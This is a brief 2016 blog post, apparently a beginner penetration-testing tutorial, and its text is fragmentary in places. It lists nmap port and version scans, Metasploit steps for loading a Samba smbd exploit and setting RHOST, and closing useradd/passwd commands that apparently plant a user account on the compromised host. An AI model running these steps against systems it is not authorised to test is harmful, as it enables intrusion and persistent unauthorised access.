Tuesday, 3 May 2016

PENETRATION TESTING


Earlier we conducted a scan of a target and discovered several services open.

command 

nmap -p 0-65535 [ip target]
nmap -sV -p [target port] [ip target]





Moving over to our metasploit console check to see if the exploit has been entered

command
search samba smbd

 


To use the exploit we type the command “use” followed by the name of the exploit. This loads the exploit into our metasploit platform. By typing “show options” see what type of settings I need to set before launching this exploit.


 
To do that we type "set RHOST” followed by the IP address and then we check our options again to verify the settings are correct.


comand

use
show options
set RHOST 



 useradd -m [username]
 passwd [userpass]
 password [root]
 re-type password [root]

page.